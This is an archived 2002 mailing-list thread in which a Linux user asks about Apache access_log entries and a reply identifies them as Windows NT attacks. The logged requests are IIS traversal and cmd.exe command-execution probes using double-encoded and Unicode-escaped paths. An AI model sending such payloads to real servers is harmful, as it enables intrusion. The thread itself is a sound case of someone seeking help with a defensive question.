access_log

epsas at inflicted.net epsas at inflicted.net
Mon Jan 28 13:44:26 PST 2002 

These are Windows NT attacks, which shouldn't affect you if you run Linux. 

Why are the IPs dashed out? "24.--.--.--7"   Is that your handiwork?

Good luck,
Charles


On Mon, Jan 28, 2002 at 11:00:59AM -1000, Todd Lee wrote:
> Hey everyone,
> 
> I was wondering if anyone out there could help me with understanding my
> access_log for httpd.  I was looking through it after setting a new RH7.2
> box with monmotha's firewall script and the latest rpms from RHN.  I just
> host my band's website and e-mail.  Anyway, I got these entries that I don't
> quite understand.  It looks like someone was trying to run something on the
> box, just wondering how to interpret these. I changed the IP...just in case
> I'm wrong and this is totally innocent, hate to give out people IP's
> unnecessarily...
> 24.--.--.--7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 317
> 24.--.--.--7 - - [28/Jan/2002:05:01:02 -1000] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 315
> 24.--.--.--7 - - [28/Jan/2002:05:01:29 -1000] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:01:48 -1000] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:02:06 -1000] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.--.--.--7 - - [28/Jan/2002:05:02:25 -1000] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:02:47 -1000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:03:27 -1000] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 372
> 24.--.--.--7 - - [28/Jan/2002:05:03:46 -1000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:03:47 -1000] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:06 -1000] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:27 -1000] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:31 -1000] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:35 -1000] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:54 -1000] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.---.--.--7 - - [28/Jan/2002:05:05:12 -1000] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 
> Thanks!
> -Todd
> 
> 
> 
> 
> 
> ---
> You are currently subscribed to luau as: epsas at inflicted.net
> To unsubscribe send a blank email to $subst('Email.Unsub')

More information about the LUAU mailing list